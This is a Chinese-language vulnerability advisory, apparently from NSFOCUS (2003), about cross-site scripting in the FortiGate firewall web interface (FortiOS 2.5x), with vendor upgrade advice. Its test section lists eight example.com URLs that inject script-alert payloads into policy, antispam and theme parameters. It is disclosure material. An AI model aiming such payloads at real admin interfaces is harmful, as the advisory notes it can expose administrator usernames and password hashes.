安全研究
安全漏洞
FortiGate Firewall Web接口跨站脚本执行漏洞
发布日期:2003-11-12
更新日期:2003-11-19
受影响系统:Fortinet FortiOS 2.50MR4
Fortinet FortiOS 2.5
Fortinet FortiOS 2.36
不受影响系统:Fortinet FortiOS 2.50MR5
描述:
BUGTRAQ ID:
9033
FortiGate Firewall是硬件防火墙解决方案。
FortiGate防火墙包含的WEB接口对URL请求缺少充分过滤,远程攻击者可以利用这个漏洞进行跨站脚本攻击,可导致敏感信息泄露。
FortiGate防火墙的WEB接口多个脚本对URI参数缺少充分过滤,如果提交包含恶意脚本代码的参数,当管理员使用浏览器对这些日志进行查看时,可导致这些脚本在浏览器上执行,会泄露包含用户名和MD5 HASH密码信息,利用这些信息可对系统进行进一步攻击。
<*来源:Maarten Hartsuijker (
maartenh@phreaker.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Maarten Hartsuijker (
maartenh@phreaker.net)提供了如下测试方法:
https://www.example.com/firewall/policy/dlg?q=-1&fzone=t<script>alert('oops')</script>>&tzone=dmz
https://www.example.com/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('oops')</script>
https://www.example.com/antispam/listdel?file=blacklist&name=b<script>alert('oops')</script>&startline=0
https://www.example.com/antispam/listdel?file=whitelist&name=a<script>alert('oops')</script>&startline=0(naturally)
http://www.example.com/theme1/selector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status"><script>alert('oops')</script>,/system/status/moniter,/system/status/session
http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session
http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script>建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 限制用户对WEB管理接口的访问。
厂商补丁:
Fortinet
--------
FortiOS 2.50 MR5不存在此漏洞,用户可以联系供应商获得升级。
http://www.fortinetfirewall.com/index.php浏览次数:2887
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |